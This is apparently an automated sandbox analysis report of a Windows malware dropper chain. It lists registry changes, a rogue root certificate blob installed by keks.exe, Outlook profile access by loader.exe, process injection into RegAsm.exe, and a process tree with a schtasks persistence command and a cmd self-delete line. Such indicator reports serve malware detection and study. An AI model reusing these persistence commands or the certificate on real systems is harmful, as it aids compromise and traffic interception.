\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe -
Modifies registry class 1 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3938118698-2964058152-2337880935-1000\{C51E317B-A7DC-4AA8-8EC2-B8CBB0CA70E0} chrome.exe -
Processes:
keks.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 keks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstc.exepid process 5244 mstc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeexplorta.exeamert.exechrome.exe2c03579092.exechrosha.exeexplorta.exerundll32.exetrf.exepowershell.exeloader.exekeks.exejok.exepowershell.exepowershell.exepid process 2184 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe 2184 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe 2492 explorta.exe 2492 explorta.exe 1592 explorta.exe 1592 explorta.exe 3684 amert.exe 3684 amert.exe 756 chrome.exe 756 chrome.exe 3020 2c03579092.exe 3020 2c03579092.exe 4956 chrosha.exe 4956 chrosha.exe 2828 explorta.exe 2828 explorta.exe 5140 rundll32.exe 5140 rundll32.exe 5140 rundll32.exe 5140 rundll32.exe 5140 rundll32.exe 5140 rundll32.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 2484 trf.exe 5140 rundll32.exe 5140 rundll32.exe 5140 rundll32.exe 5140 rundll32.exe 5720 powershell.exe 5720 powershell.exe 5720 powershell.exe 5728 loader.exe 5728 loader.exe 1864 keks.exe 1864 keks.exe 5728 loader.exe 3684 jok.exe 3684 jok.exe 4072 powershell.exe 4072 powershell.exe 4072 powershell.exe 3684 jok.exe 3684 jok.exe 5336 powershell.exe 5336 powershell.exe 5336 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
run.exepid process 2348 run.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
chrome.exepid process 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exedescription pid process Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe Token: SeShutdownPrivilege 756 chrome.exe Token: SeCreatePagefilePrivilege 756 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
8a14325f02.exechrome.exeu47o.3.exepid process 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 2060 8a14325f02.exe 756 chrome.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 3636 u47o.3.exe -
Suspicious use of SendNotifyMessage 55 IoCs
Processes:
8a14325f02.exechrome.exeu47o.3.exepid process 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 756 chrome.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 2060 8a14325f02.exe 3636 u47o.3.exe 3636 u47o.3.exe 3636 u47o.3.exe 3636 u47o.3.exe 3636 u47o.3.exe 3636 u47o.3.exe 3636 u47o.3.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
run.exemstc.exepid process 2348 run.exe 2348 run.exe 5244 mstc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exe8a14325f02.exechrome.exedescription pid process target process PID 2184 wrote to memory of 2492 2184 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe explorta.exe PID 2184 wrote to memory of 2492 2184 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe explorta.exe PID 2184 wrote to memory of 2492 2184 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe explorta.exe PID 2492 wrote to memory of 1364 2492 explorta.exe explorta.exe PID 2492 wrote to memory of 1364 2492 explorta.exe explorta.exe PID 2492 wrote to memory of 1364 2492 explorta.exe explorta.exe PID 2492 wrote to memory of 3684 2492 explorta.exe amert.exe PID 2492 wrote to memory of 3684 2492 explorta.exe amert.exe PID 2492 wrote to memory of 3684 2492 explorta.exe amert.exe PID 2492 wrote to memory of 2060 2492 explorta.exe 8a14325f02.exe PID 2492 wrote to memory of 2060 2492 explorta.exe 8a14325f02.exe PID 2492 wrote to memory of 2060 2492 explorta.exe 8a14325f02.exe PID 2060 wrote to memory of 756 2060 8a14325f02.exe chrome.exe PID 2060 wrote to memory of 756 2060 8a14325f02.exe chrome.exe PID 756 wrote to memory of 1632 756 chrome.exe chrome.exe PID 756 wrote to memory of 1632 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 2596 756 chrome.exe chrome.exe PID 756 wrote to memory of 4344 756 chrome.exe chrome.exe PID 756 wrote to memory of 4344 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe PID 756 wrote to memory of 4836 756 chrome.exe chrome.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
loader.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 loader.exe -
outlook_win_path 1 IoCs
Processes:
loader.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 loader.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe"C:\Users\Admin\AppData\Local\Temp\654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3684 -
C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b758ab58,0x7ff9b758ab68,0x7ff9b758ab785⤵PID:1632
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:25⤵PID:2596
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:85⤵PID:4344
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2204 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:85⤵PID:4836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:15⤵PID:1104
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:15⤵PID:4108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4280 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:15⤵PID:1552
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3308 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:15⤵PID:2888
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4504 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:85⤵PID:1692
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:85⤵
- Modifies registry class
PID:4956 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:85⤵PID:2444
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4972 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:85⤵PID:1020
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:85⤵PID:3320
-
C:\Users\Admin\1000017002\2c03579092.exe"C:\Users\Admin\1000017002\2c03579092.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3020
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1592
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2712 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 8883⤵
- Program crash
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4328 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4376
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2868
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2484 -
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:1768
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:2684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 3643⤵
- Program crash
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:328 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 3883⤵
- Program crash
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
PID:2108 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3684 -
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
